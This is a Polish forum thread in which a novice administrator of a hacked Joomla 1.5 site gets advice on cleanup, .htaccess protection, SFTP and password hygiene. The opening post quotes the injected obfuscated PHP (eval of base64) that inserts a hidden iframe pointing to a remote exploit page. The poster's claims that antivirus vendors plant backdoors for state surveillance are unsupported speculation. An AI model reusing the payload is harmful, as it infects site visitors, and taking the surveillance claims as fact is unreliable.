Po wejściu na stronę wyświetla mi się u góry strony następujący kod:
eval("?>".base64_decode("PD9waHAgZWNobyAnPGlmcmFtZSBzcmM9Imh0dHA6Ly9
3d3cucGhyYWUudHYvaW1hZ2VzL3VwZGF0ZS5waHAiIHdpZHRoPSIzMCIgaGVpZ2h0PSI
zMCIgZnJhbWVib3JkZXI9IjAiPjwvaWZyYW1lPic7ID8+"));eval("?>".base64_decode("PD
9waHAgZWNobyAnPGlmcmFtZSBzcmM9Imh0dHA6Ly93d3cucGhyYWUudHYvaW1hZ2Vz
L3VwZGF0ZS5waHAiIHdpZHRoPSIzMCIgaGVpZ2h0PSIzMCIgZnJhbWVib3JkZXI9IjAiPjwv
aWZyYW1lPic7ID8+"));
Mam rozumieć, że to jakiś trojan?
Co powinienem z tym zrobić?
Przywrócić kopię strony, zabezpieczyć katalog administrator plikiem .htaccess i sprawdzić na wikijoomla jakie uprawienia nadać folderom, aby były zabezpieczone prawidłowo.
Dobra, pomogło, dziękuję.
Co do zabezpieczenia .htaccess - nie bardzo wiem jak tego użyć - jeśli chodzi o www to w zasadzie uczę się tego dopiero, tym bardziej że nie ja tę stronę budowałem. Więc jakby ktoś mógł coś podpowiedzieć...
Migrację rozważę - słuszna uwaga.
Co do rzeczowego problemu - co to dokładnie było?
W katalogu http://adrestwojejstrony.pl/administrator/ tworzysz plik .htaccess o treści
Code: apache
Log in, to see the code
AuthName określa tytuł okna w panelu logowania, więc możesz wpisać co chcesz.
AuthUserFile określa pełną ścieżkę. Jeśli jej nie znasz, to tworzysz plik info.php o treści
Code: php
Log in, to see the code
w katalogu http://adrestwojejstrony.pl/administrator/ Następnie w przeglądarce wpisujesz adres http://adrestwojejstrony.pl/administrator/info.php i na ekranie masz info o ścieżce.
[*:9df3f94c79] Następnie tworzysz plik .htpasswd w katalogu http://adrestwojejstrony.pl/administrator/ o treści:
Code: apache
Log in, to see the code
Hasło najlepiej zakodować algorytmem MD5 (zwiększa to znacznie bezpieczeństwo) generator haseł → http://aspirine.org/htpasswd_en.html Dla powyższego zakodowane
Code: apache
Log in, to see the code
[*:9df3f94c79]Cieszysz się z zabezpieczenia. Nie zapomnij, że w Linuksie pliki z kropką na początku w nazwie, są plikami ukrytymi. Jeśli będziesz to robił przez klienta FTP, to włącz wyświetlanie ukrytych plików Warto też pomyśleć o certyfikacie SSL (nie trzeba go kupować, możesz wystawić i podpisać sam) i wymuszeniu połączenia szyfrowanego via https do panelu admina.
Dobra, o zabezpieczeniach pomyślę, tymczasem dzisiaj miał miejsce drugi atak. Wiem już kiedy i jakie pliki zostały podmienione, wszystko wskazuje że przez ftp. Niestety, w tym momencie nie mam danych umożliwiających zmianę hasła ftp. Czy jest możliwość namierzenia delikwenta przy następnym ataku? W jaki sposób, jakie dane (i czy to w ogóle możliwe) powinien skopiować/zabezpieczyć przed udaniem się na policję, gdyby miał miejsce kolejny atak?
Kto ma dostęp do FTP ? I czy przypadkiem nie korzysta z TotalCommandera ? Musisz na sam początek zmienić hasło, bo inaczej to walka z wiatrakami. Jeżeli na razie nie możesz zmigrować na wyższą wersję Joomli, to zainstaluj JDefender (celem zabezpieczenia przed innymi rodzajami ataku..) i zrób te wszystkie zabezpieczenia o których powyżej.
FTP mam teoretycznie tylko ja i poprzedni administrator, który niestety nie dał mi danych potrzebnych do zarządzania, oprócz haseł ftp i do serwera baz danych. Tamten gość jest raczej poza kręgiem podejrzeń, ja nie zaobserwowałem u siebie podwójnej osobowości więc raczej też, albo włam na maila gdzie były te hasła albo ktoś jest tak dobry, że włamał się na mój komp, do którego nikt nie ma fizycznego dostępu, albo był jeszcze lepszy i złamał zabezpieczenia ftp. Innej możliwości nie widzę. Nie ma możliwości namierzenia? Nie ma możliwości zrobienia "dowodów zbrodni" - w sensie uznawanym przez organ ścigania, w domowych warunkach?
zamiast FTP używaj SFTP. FTP ma niewiele wspólnego z bezpieczeństwem. Login, hasło oraz inne dane nie są szyfrowane podczas przesyłania, więc można je przechwycić.
nie zapisuj haseł w klientach FTP i SFTP (w sieci krąży sporo dziadostwa, instalującego się przez przeglądarkę w systemie, wysyłającego loginy i hasła, a wiele klientów trzyma je w plikach tekstowych w postaci jawnej)
Włam nie musiał odbyć się przez FTP. Skrypciarze nie śpią, dlatego jak wsponiałem wcześniej migracja do Joomla 2.5 lub 3.0 nie ominie Cię. Bez analizy logów prawdopodobnie nie dowiesz się zbyt dużo. A do nich, jak napisał Moran, dostęp ma administrator serwera.
Przez Filezille. Chyba zacznę używać do tego celu Linuxa live CD...
Dodano po 2 [minuty]:
mrmarkos wrote:
Włam nie musiał odbyć się przez FTP.
Podmienione/zmodyfikowane zostały tylko konkretne pliki o danej godzinie - wygląda to na włam ftp. Chociaż w kwestii stron dopiero się uczę więc mogę się mylić.
Problem jest stary i znany.
Tronajny trzepią standardowe oprogramowanie w poszukiwaniu haseł tak jak trzepią skrzynki adresowe w poszukiwaniu maili.
Jest na to jedno rozwiązanie nie zapisywać haseł nigdzie w programach.
Dodatkowo istnieje możliwość taka ze taki złośliwy soft jest w stanie wyłuskać z danych na interfejsie sieciowym pewne specyficzne rzeczy np komunikacje z ftp i wyłapać z tego dane.
Dlatego bezpiecznie jest korzystać z WinSCP jako klienta jesli serwer pozwala na SFTP.
I jeśli tylko dwie osoby znały hasło to winna jest co najmniej jedna z nich -> pożądane przyglądniecie się temu co w kompie piszczy.
Zmiana haseł jest priorytetowa i obowiązkowa inaczej niema to sensu. To jest na 99 % włam automatyczny.
Ktoś wchodzi na stronę infekuje sobie kompa a trojan wykrada dane.
Potem złośliwy soft loguje się gdzie może i dorzuca złośliwy kod tam gdzie ma dostęp i tu sie zapętla koło mamy mechanizm zapewniający zagorzeniu przeżycie.
Oczywiście porucz tego złośliwe oprogramowanie może robić co zechce (w praktyce co może)
tak na serwerze jak i zainfekowanych kompach userów w tym atakować kolejne serwery.
Dlatego właśnie szukanie źródła ataku jest raczej skazane na niepowodzenie bo może sie okazać ze to bogu ducha winny człowieczek. Co do namierzenia jest to możliwe poproś o logi z serwera masz date modyfikacji plików wiec wiesz z kiedy.
Nie znam się aż tak bardzo na tym, ale problem jest chyba poważniejszy niż włam automatyczny. Nie dość że po raz trzeci zmodyfikowano dzisiaj pliki, tym razem zupełnie inaczej, to uszkodzono na dwóch moich komputerach prywatnych kopie zapasowe strony poprzez usunięcie części folderów, uszkodzono również część (na szczęście tylko część) screenów, które dosłownie przed chwilą zbierałem jako dowody... Poza tym, tym razem poważnie uszkodzono stronę, między innym uszkodzony jest panel administracyjny i usunięta część artykułów. Zostało to zrobione niemal w jednym momencie.
To co napisał Tommy82 miało miejsce zwłaszcza przy wykorzystaniu TC jako klienta ftp, jeśli trojan przejął zapisane przez TC hasła. Trojan dopisywał do plików index.php jakie tylko znalazł swój kod, co umożliwiało jego replikację, jeśli tylko gdzieś pozostał zainfekowany plik. Lekarstwem była zmiana haseł i dokładne wyczyszczenie strony oraz zmiana atrybutów plików i katalogów.
to uszkodzono na dwóch moich komputerach prywatnych kopie zapasowe strony poprzez usunięcie części folderów, uszkodzono również część (na szczęście tylko część) screenów, które dosłownie przed chwilą zbierałem jako dowody..
Pozmieniaj hasła do FTP i panelu administracyjnego na hostingu z poziomu LiveCD z Linuksem, np. Kubuntu
Przeskanuj komputery prywatne programem antywirusowym z LiveCD (najlepiej dwoma):
Sytuacja wygląda tak - nie pomogła zmiana haseł, używanie Linuxa, reinstalacja Windows. Zabawa a kotka i myszkę - oni atakowali stronę ja przywracałem. Z logów serwera nic konkretnego nie wynika. Chyba się komuś w końcu znudziło bo narazie spokój - moim zdaniem to, jak i różne godziny i sposoby ataku, świadczą że nie był to automatyczny skrypt ale działanie ludzkie. Atakowane są natomiast komputery - biurowe i moje prywatne (nie wiem jak prywatne pozostałych pracowników). Na przykład cały czas ktoś próbuje mi władować trojana przez przeglądarkę - nie pomaga zmiana na IE, Operę, Chrome. Za każdym razem jest to inne zagrożenie, nie jest powiązane z przeglądaniem określonej strony, dokładnie źródła ataku określić nie potrafię. Już zastosowaliśmy wszelkie środki ostrożności - praca offline (połączenie tylko w razie potrzeby), używanie kilku różnych wersji Linux, nie używanie tych samych nośników, używanie danych zapisanych wcześniej na płytach R (do jednokrotnego zapisu). W akcie desperacji dwa razy dziennie traktuję komputery Combofixem. Dwa razy dziennie zmieniam też program antywirusowy - okazuje się, że trochę pomaga. Jest to bardzo ciekawe, bo przez kilka godzin taki Comodo wykrywa zagrożenia, po czym zaczyna milczeć a na drugi dzień Combofix pozbawia złudzeń. Tak samo z Nortonem 2009 - jego zainstalowanie pomaga na chwilę, po czym trzeba go z powrotem zmienić na Comodo. Na wszelki wypadek zaopatrzę się w kilka innych.
Chciałbym zgłosić sprawę na policję ale:
- Ktoś dobrze zaciera ślady - z logo serwera nic nie wynika. Za to ilość moich interwencji skieruje na mnie podejrzenia.
- Dobrze zatarte ślady ataków na komputery prywatne - oprócz pliku złapanego do kwarantanny nie idzie znaleźć nic. Nawet w sytuacji zdalnego usunięcia antywirusa w jednym z komputerów nie ma żadnych śladów - nie znalazłem nic w rejestrze, nie ma o tym wzmianki w przywracaniu systemu, mimo, że zakres czasowy obejmuje to zdarzenie.
- Wszystkie komputery biurowe, jak i moje prywatne musiałbym oddać i nie wiem kiedy by wróciły = praca sparaliżowana, brak komputera w domu itp - na to sobie nie mogę pozwolić.
- Z wyboru - praca i skupienie się na samoobronie (ze skutkiem zacierania niektórych śladów) vs. danie "wolnej ręki" (wraz z konsekwencjami) i zbieranie dowodów wybrałem to pierwsze. Część dowodów w postaci np: kopii zainfekowanej strony, czasu, kiedy pliki zostały zmodyfikowane itp jest. Ale nie mamy tyle przestrzeni żeby zabezpieczyć np: kopię dysku zainfekowanego komputera
Za tydzień spróbuję przemigrować profilaktycznie na nowszą joomlę i zastosować Wasze porady - jednak w świetle tych wydarzeń i umiejętności włamywaczy, nie wiem czy ma to jakikolwiek sens. Czuję się jakbym grał w jakimś filmie kryminalnym/szpiegowskim :-/
też kiedyś ktoś mi się włamał i używałem tego samego programu do FTP co Ty, napisz jeszcze czy masz skrót od Filezilly na pulpicie ? Jeśli tak to usuń go z tamtąd i wrzuć gdziekolwiek tylko nie na pulpit. Juz nie pamiętam dokładnie, ale chyba jakiegoś wirusa czy trojana miałem który zczytywał hasło zapisane w tym programie i działał gdy się miało skrót na pulpice.
To chyba jakieś voo doo ktoś uprawia... Wobec powyższych ja spróbowałbym zainstalować jakiś firewall (np.Kerio) i obserwował jego komunikaty o wchodzących czy wychodzących połączeniach - może tak da się namierzyć intruza. I przeskanowałbym wszystkie komputery w twojej sieci (z pendrivami włącznie..)
Sytuacja na dzisiaj wygląda tak: instalacja dowolnego antywirusa (Comodo, NOD, Norton z przed 2009 roku - mam pełno triali na płytach z czasopism oraz niewykorzystane OEM-y) = wykrywanie ataków - skanowanie portów + konie trojańskie ładowane przez przeglądarkę. Wykrywanie trwa do momentu... aktualizacji bazy danych. Wnioski nasuwają się same... Wiedziałem, że mamy przyzwolenie na inwigilację ale nie wiedziałem że aż tak. Kilka adresów IP namierzyłem - ślady sugerują okolice Warszawy i pewien publiczny portal internetowy ale tu muszę się upewnić, bo po zablokowaniu adresu skanującego porty ataki ustały, za to ponownie zainfekowano stronę internetową. Wspomnę jeszcze, że jestem użytkownikiem neostrady, więc IP zmienia się po rozłączeniu i ponownym połączeniu. Ponieważ ostatnio internet często mi się rozłącza (przypadek?) zrobiłem sobie skrypt resetujący połączenie co godzinę. Zmiana IP nie powoduje zaprzestania skanowania portów - może się mylę co do wniosków co do wniosków ale... Nie voodoo a prędzej kolejny odcinek z Archiwum X (w sensie, że sprawa przeczy zdrowemu rozsądkowi). Natomiast nie ma tutaj zielonych ludzików czy zjawisk paranormalnych a zaplecze specjalistów lub/i przyzwolenie producentów programów antywirusowych, którzy sami tworzą furtki dla odpowiednich służb (na co wprawdzie dowodów nie mam ale sugeruje to sytuacja - stary antywirus niezaktualizowany = pokazuje włamy vs. nowy antyvir/antywir z aktualną bazą danych = brak reakcji). To nie SF, to rzeczywistość. Już przyszły skargi od administracji serwera, że nasza strona atakuje i wysyła spam. Mam o tyle przechlapane, że jestem raczej sprzętowcem (a zatrudnionym nie jako informatyk ale pracownik administracyjny) i tych wszystkich rzeczy dopiero teraz się uczę...
Przepraszam za mały offtop - nerwy mi już puszczają - ale piszę to żeby uświadomić czytających ten temat jak bardzo narażeni jesteśmy chyba na inwigilację, bo to już nie są typowe wirusy, przeciw którym do tej pory chroniły pierwsze lepsze programy, ale celowy atak skierowany w konkretne osoby. A że jestem pracownikiem posła z partii prawicowej, to trzeba pozbyć "faszysty", "homofoba" czy jak kto woli "mohera" który śmie wytykać korupcję, złodziejstwo, kłamstwo czy pisać o energetyce jądrowej, homoseksualizmie lub marihuanie, co gorsza podpierając się publikacjami, wzorami, naukowym wnioskowaniem. Tyle, że do tej pory ataki na mnie, na innych pracowników, pracodawcę czy działaczy, groźby, próby skompromitowania były przeprowadzane tylko w realu.
Koniec offtopa.
Zastanawiam się czy bardzo podpadnę jak tutaj umieszczę cały, bardziej szczegółowy przebieg zdarzeń wraz ze screenami, publikując między innymi adresy włamywaczy wraz z datą i godziną włamań
Nie zauważyłem nic podejrzanego. Też przypuszczam, że ten ktoś dobrze się zabezpieczył - jednak sprawdziłem co się da, geolokalizację (ukryty za netią z pewnej miejscowości niedaleko Warszawy) oraz tracert - bezpośrednia droga od mojego dostawcy do właśnie tej netii). Tak jak pisałem - uczę się tego dopiero. Ale jak mam jeszcze zrobić skoro do ładowania strony używam Linuxa live CD, którego wersje w dodatku co jakiś czas zmieniam, zainstalowałem od nowa czysty system i antywirus będąc niepołączonym z internetem a po podłączeniu, zanim antywir się zaktualizował zanotowałem właśnie skanowanie portów. Co przeoczyłem? Wirus w BIOS? W pamięci RAM raczej nie. Ale jeśli coś przeoczyłem to proszę o napisanie - tak jak wspomniałem - to są dla mnie nowe rzeczy.
Mała aktualizacja/pytanie: dwa z adresów to (chyba) DNS-y Neostrady (194.204.159.1 i 194.204.152.34). Po co Neostrada skanuje mi porty i dlaczego robi to dopiero od kilku dni? Czy to po prostu włam innego użytkownika Neostrady?
>Nie znam się aż tak bardzo na tym, ale problem jest chyba poważniejszy niż włam automatyczny.
Wręcz przeciwnie tylko automatyzacja powoduje ze to się opłaca. Odkrył już to Henry Ford. Aczkolwiek coraz bardziej skomplikowane gówna powstają.
To jest biznes niestety. Jest z tego forsa są "inwestycje". A włam automatyczny to problem najpoważniejszy z możliwych bo człowiek kiedyś spać musi.
Istotne jest zrozumienie jak działa to gówno.
To działa wielotorowo z jednej strony samo się rozprzestrzeniać próbuje czy to rozsyłając spam z wirusami czy atakując inne strony (taki powiedzmy system który dąży do przetrwania gatunku) a z drugiej coś tam robi to ma dla kogoś forsę zarabiać. Może kraść dane do kont bankowych może spam rozsyłać z reklamą wiagry czy poszukiwać słupków do podstawiania po odbiór kasy i tak dalej. Ma dwa cele musi być coraz większy i musi zarabiać pieniądze.
Pamiętaj ze to jest tylko jeden mały element struktury która się dynamicznie zmienia pod wpływem różnych czynników. Popatrz na to jak na organizm. Jaki sens ma kierowanie odnośnika do strony którą ktoś wystrzelił w kosmos bo na przykład wyczerpała transfer albo admin zrobił jej down żeby po włamie posprzątać? Po co umieszczać kod który w tej chwili już antywiry maja w bazie i reagują?
Możliwe ze masz tez "wroga" w swoich szeregach czyli kogoś kto coś cały czas robi mimo ze mu zakazałeś bo tak mu wygodnie/wie lepiej/całe życie tak robił i było ok.
->Sytuacja wygląda tak - nie pomogła zmiana haseł, używanie Linuxa, reinstalacja Windows. Zabawa a kotka i myszkę - oni atakowali stronę ja przywracałem. Z logów serwera nic konkretnego nie wynika.
Tak działa waśni automat. Pytanie jak wyciekły dane autoryzacyjne do konta? Może to usługodawca ma problem?
A z logów serwera wynika wszystko.
-> moim zdaniem to, jak i różne godziny i sposoby ataku, świadczą że nie był to automatyczny skrypt ale działanie ludzkie.
Wręcz przeciwnie. Zauważ ze masz eval wyświetlony. Eval ma kod wykonać a nie wyświetlić. Ten kawałek akurat się nie wykonał. Nawet nie miałeś tego zobaczyć Co to za atak który się ujawnia?
Jak by nie to to bys do tej pory nie wiedział o tym Ten kod miał dodać do dokumentu
<iframe [..]></iframe>'
Jak wchodzisz na ta stronę to przeglądarka pobiera kod z tego adresu a tam jest exploit.
Jak masz log z ftp to sprawdź ile zajęła modyfikacja tych plików i będziesz wiedział czy to skrypt czy człowiek. Człowiek tego błędu nie popełni on taki skrypt doda dobrze. Skrypt doda takich miliony cześć dobrze.
Jak cały czas otwierasz zainfekowaną niewyczyszczoną stronę to tak będzie. Nie da się wpakować trojana od tak. Domyślnie to przeglądarka wysyła zadania. Wiec Albo wchodzisz na zainfekowaną stronę albo coś wymusza otwarcie przeglądarki żeby skorzystac z jakiejś luki. Może to być na przykład mail albo jakieś złośliwe oprogramowanie które siedzi cały czas.
->Za każdym razem jest to inne zagrożenie, nie jest powiązane z przeglądaniem określonej strony, dokładnie źródła ataku określić nie potrafię.
Bo to działa tak ze ma paczkę exploitów i próbuje aż trafi na dziurę.
->Jest to bardzo ciekawe, bo przez kilka godzin taki Comodo wykrywa zagrożenia, po czym zaczyna milczeć a na drugi dzień Combofix pozbawia złudzeń. Tak samo z Nortonem 2009 - jego zainstalowanie pomaga na chwilę, po czym trzeba go z powrotem zmienić na Comodo. Na wszelki wypadek zaopatrzę się w kilka innych.
To proste jak już któryś exploit zadziała to masz po anty wirze. I już istnieje tylko porforma.
->Chciałbym zgłosić sprawę na policję ale:
W sumie szkoda zachodu. Ale może nie było by źle zostawić w papierach policji jakiś zapis. Bo to się może przydać jak by się okazało ze z twoich kompów coś narozrabiało i ktos poszedł jednak na policje.
->- Ktoś dobrze zaciera ślady - z logo serwera nic nie wynika.
Jak to nic nie wynika? same sie pliki pozmieniały?
-> Za to ilość moich interwencji skieruje na mnie podejrzenia.
Tu akurat nie ma problemu bo Ty masz pełne prawo tam grzebać (co zakładam).
- Dobrze zatarte ślady ataków na komputery prywatne - oprócz pliku złapanego do kwarantanny nie idzie znaleźć nic. Nawet w sytuacji zdalnego usunięcia antywirusa w jednym z komputerów nie ma żadnych śladów - nie znalazłem nic w rejestrze, nie ma o tym wzmianki w przywracaniu systemu, mimo, że zakres czasowy obejmuje to zdarzenie.
To sa ludzie którzy tak na chleb zarabiają. Jak widać jeszcze z głodu nie umarli. Nie oszukujmy sie to są eksperci.
->Za tydzień spróbuję przemigrować profilaktycznie na nowszą joomlę i zastosować Wasze porady - jednak w świetle tych wydarzeń i umiejętności włamywaczy, nie wiem czy ma to jakikolwiek sens. Czuję się jakbym grał w jakimś filmie kryminalnym/szpiegowskim :-/
Możliwe ze ktos z dziury w joomli korzysta. Żaden film, mało jeszcze w życiu widziałeś.
->Sytuacja na dzisiaj wygląda tak: instalacja dowolnego antywirusa (Comodo, NOD, Norton z przed 2009 roku - mam pełno triali na płytach z czasopism oraz niewykorzystane OEM-y) = wykrywanie ataków - skanowanie portów + konie trojańskie ładowane przez przeglądarkę. Wykrywanie trwa do momentu... aktualizacji bazy danych. Wnioski nasuwają się same...
Niekoniecznie antywir z przed 2009 Cie przed niczym nie chroni, ale jeszcze napisze Ci co się dzieje
Pamiętaj ze jak ustawisz wysokie poziomy bezpieczeństwa to zgodnie z logika mniejszym błędem jest fałszywy alarm niz przepuszczenie ataku. Skanowania portów to norma szczególnie na neo.
-> Wiedziałem, że mamy przyzwolenie na inwigilację ale nie wiedziałem że aż tak.
Co to za inwigilacja o której wiesz?
->Kilka adresów IP namierzyłem - ślady sugerują okolice Warszawy i pewien publiczny portal internetowy ale tu muszę się upewnić, bo po zablokowaniu adresu skanującego porty ataki ustały, za to ponownie zainfekowano stronę internetową.
Portscan to standard leci tego tyle ze głowa mała. Takie czasy.
-> Wspomnę jeszcze, że jestem użytkownikiem neostrady, więc IP zmienia się po rozłączeniu i ponownym połączeniu. Ponieważ ostatnio internet często mi się rozłącza (przypadek?) zrobiłem sobie skrypt resetujący połączenie co godzinę.
Nie ogarniam, internet Ci się rozłącza i zrobiłeś skrypt który go sam rozłącza?
Po pierwsze kuknij jaki jest stan na lini po drugie zadzwoń na infolinie tepsy i dowedz se czegoś o przyczynach rwania neta. Sprawdź czy sie ruter nie przegrzewa i jakie napiecie daje zasilacz. Jak nie jest juz na gwarancji i jest Twój a nie pożyczony od tepsy to sprawdź czy nie ma spuchniętych kondensatorów. Jak ładowarka daje większe napięcie jak powinna to prawie na pewno kondensatory tez bęą uszkodzone. Przygotuj sobie plan działania i eliminuj problemy po kolei.
->Zmiana IP nie powoduje zaprzestania skanowania portów - może się mylę co do wniosków co do wniosków ale... Nie voodoo a prędzej kolejny odcinek z Archiwum X (w sensie, że sprawa przeczy zdrowemu rozsądkowi). Natomiast nie ma tutaj zielonych ludzików czy zjawisk paranormalnych a zaplecze specjalistów lub/i przyzwolenie producentów programów antywirusowych, którzy sami tworzą furtki dla odpowiednich służb (na co wprawdzie dowodów nie mam ale sugeruje to sytuacja - stary antywirus niezaktualizowany = pokazuje włamy vs. nowy antyvir/antywir z aktualną bazą danych = brak reakcji). To nie SF, to rzeczywistość.
Skanowanie jest powszechne. A z tymi antywirusami różnie może być. Najprawdopodobniej zachowujesz sie niestandardowo traktując starym anty wirem którego złośliwy soft nie umie ubić. Tylko ze sam sie wystawiasz bo taki antywir jest w stanie przepuścić coś czego nie rozpozna. To jest kwadratura koła. Bo masz cały czas coś co bruździ.
->Już przyszły skargi od administracji serwera, że nasza strona atakuje i wysyła spam. Mam o tyle przechlapane, że jestem raczej sprzętowcem (a zatrudnionym nie jako informatyk ale pracownik administracyjny) i tych wszystkich rzeczy dopiero teraz się uczę...
->Przepraszam za mały offtop - nerwy mi już puszczają
Bo tu trzeba podchodzić z głowa a nie nerwami.
->Zastanawiam się czy bardzo podpadnę jak tutaj umieszczę cały, bardziej szczegółowy przebieg zdarzeń wraz ze screenami, publikując między innymi adresy włamywaczy wraz z datą i godziną włamań
Tak jak już napisałem to nie będą włamywacze tylko osoby które mają taki sam problem jak i Ty. Z jednej strony Bo sam spam rozsyłasz jak wiesz zresztą. Zależy tez od rodzaju aktywności bo mogą to być osoby które węszą bo ktoś z tych IP ich skanował i tak dalej.
-> Nie zauważyłem nic podejrzanego. Też przypuszczam, że ten ktoś dobrze się zabezpieczył - jednak sprawdziłem co się da, geolokalizację (ukryty za netią z pewnej miejscowości niedaleko Warszawy)
Za netią nikt poważny się nie będzie ukrywał. Geolokazlizacja IP to jedna wielka kupa.
->oraz tracert - bezpośrednia droga od mojego dostawcy do właśnie tej netii).
Tak działa internet nie ma w tym nic dziwnego rutery brzegowe tak trasują i tyle tylko ze user z jednej czy drugiej strony nie ma wpływu na ruter brzegowy.
->Ale jak mam jeszcze zrobić skoro do ładowania strony używam Linuxa live CD,
hasła pozmieniane? Kto ma jeszcze dostęp od nich. Może masz tam jakiegoś amatora porno rozrywek.
-> którego wersje w dodatku co jakiś czas zmieniam,
Jak wchodzisz na zainfekowaną stronę jest opcja ze nawet na linuxa exploity mają.
Pod żadnym pozorem nie wchodź na tę stronę przez przeglądarkę. Niekiedy nawet kilka dni może zająć zanim anty wir będzie ogarniał jakiś kod.
->zainstalowałem od nowa czysty system i antywirus będąc niepołączonym z internetem a po podłączeniu, zanim antywir się zaktualizował zanotowałem właśnie skanowanie portów.
Poza tym śwież system jeśli miałeś ip publiczne też świeże to to czysty przepadek.
->Co przeoczyłem? Wirus w BIOS? W pamięci RAM raczej nie. Ale jeśli coś przeoczyłem to proszę o napisanie - tak jak wspomniałem - to są dla mnie nowe rzeczy.
Możliwy jest wirus bios no ale mało prawdopodobny, Jak chcesz iśc tym tokiem to z pamięci rom karty graficznej czy boot romu sieciówki tez można by kod uruchomić. Z czystej ostrożności wymienił bym ruter albo przeflashował softem ze strony producenta.
->Mała aktualizacja/pytanie: dwa z adresów to (chyba) DNS-y Neostrady (194.204.159.1 i 194.204.152.34). Po co Neostrada skanuje mi porty i dlaczego robi to dopiero od kilku dni? Czy to po prostu włam innego użytkownika Neostrady?
Trudno wyczuć zapytaj ich najpierw może.
Jest opcja ze odpowiedź na zapytanie dns jest z jakiegoś podwu błędnie interpretowana. Na jaki port? . Jest tez opcja ze ktoś nie będący serwerem tepsy taki pakiet wysyła.
Jeśli pakiet do Ciebie przyszedł od "dnsa neostrady" to gdzie poleci odpowiedź? Może właśnie bierzesz udział w ataku DDoS na serwery DNS Neo.
A co do stronki to poproś operatora żeby wyłączył ftp i co sie da. Wszelkie panele i inne myadminy. I załatw to telefonicznie.
Może sie okazać ze winny jest bład u operatora. A jomla pada ofiara bo znana jest struktura bazy danych ale to takie powiedzmy SF.
1. Z logów które dostałem można wyczytać wszystko, czyli nic - nie ma rozróżnień modyfikacji ftp od wchodzenia na stronę.
2. Tylko usługodawca lub moja stara Nokia wchodzi w grę, teraz w ogóle hasło mam tylko w głowie.
3. Z tym Eval to się zaczęło tylko, skończyło się na tym, że przy trzecim ataku już się nie wyświetlił. Później sprawdzałem już tylko daty modyfikacji plików.
4. Złośliwe oprogramowanie odpada bo dla czystości instalowałem system od nowa, na wyzerowanym wcześniej dysku, będąc odłączonym od sieci do momentu zabezpieczenia się oprogramowaniem antywirusowym itp, oraz używałem Linuxa odpalanego z płyty - nie tylko Ubuntu.
5. Wcześniej nie miałem przez kilka lat żadnych skanowań portów.
6. Inwigilacja - od oddawania swoich danych na facebook, po sledzące na maksa oprogramowanie i takie jaja jak opisałem. Albo np: służbowe iPady posłów, które są na podglądzie (na to akurat mam dowody ale sprawa jest narazie nie do ruszenia).
7. Od mniej więcej połowy lutego do tego weekendu neostrada mi się cały czas rozłączała, albo pisało że jest połączone ale połączenie nie działało. Więc zrobiłem sobie automat - co godzinę rozłączenie i ponowne połączenie. Dodzwonienie się do nich graniczy z cudem. Jeszcze gorzej z interwencją. Sprzęt jest w porządku - błąd był po ich stronie.
Ogólnie narazie jest chwilowy spokój - mimo, że przez ostatnie kilka włamań ograniczyłem się już tylko do ładowania zdrowej strony na serwer (dałem sobie spokój z reinstalacjami, antywirusy wykryły tylko zagrożenia w plikach tymczasowych przeglądarki) - co jednak sugeruje, że to nie automat albo inaczej - że ten automat jednak jest pod czyjąś kontrolą i nie trafił do nas przypadkowo.
EDIT> Dzisiaj złapałem na gorącym uczynku (ktoś wrzucił na serwer, na szczęście wtedy kiedy ja siedziałem na ftp, pliki httacces i php z adresem, który jak mniemam, miał uzyskać jakiś dostęp do strony, w każdym razie edycja była nieautoryzowana).
Teraz zabezpieczenia - miałem troszkę czasu, opracowałem sobie mniej więcej pliki htacces i htpaswd dla autoryzowanych użytkowników. Teraz pytanie: gdzie mogę je wstawić? To znaczy chodzi mi o lokalizację. Np: mam w katalogu wyższym niż www stworzyć sobie własny katalog i tam wstawić htpaswd? I jaka wtedy będzie deklarowana w httacces ścieżka dostępu?
Zabezpieczenie pomogło, przynajmniej częściowo, ale jest jeden problem. Jakimś cudem, nie przez FTP, udaje im się wrzucać foldery i zmodyfikowane pliki do katalogu www (ten nie jest zabezpieczony, ponieważ uniemożliwiłoby to uruchomienie strony). Wprawdzie nie ma to już żadnego wpływu na funkcjonowanie strony (przynajmniej na razie), ale gdzieś jest dziura. Szukam poradników, jak w miarę bezboleśnie przejść do nowszej Joomli, ale brakuje mi czasu na eksperymenty.
Jeśli chodzi o przejście z Joomli 1.5 na 2.5, to nie da się tego zrobić bezboleśnie. Natomiast od 2.5 aktualizacje bezpieczeństwa jak do nowszych wersji wykonuje się jednym kliknięciem.
Warto też pomyśleć o certyfikacie SSL (nie trzeba go kupować, możesz wystawić i podpisać sam) i wymuszeniu połączenia szyfrowanego via https do panelu admina.
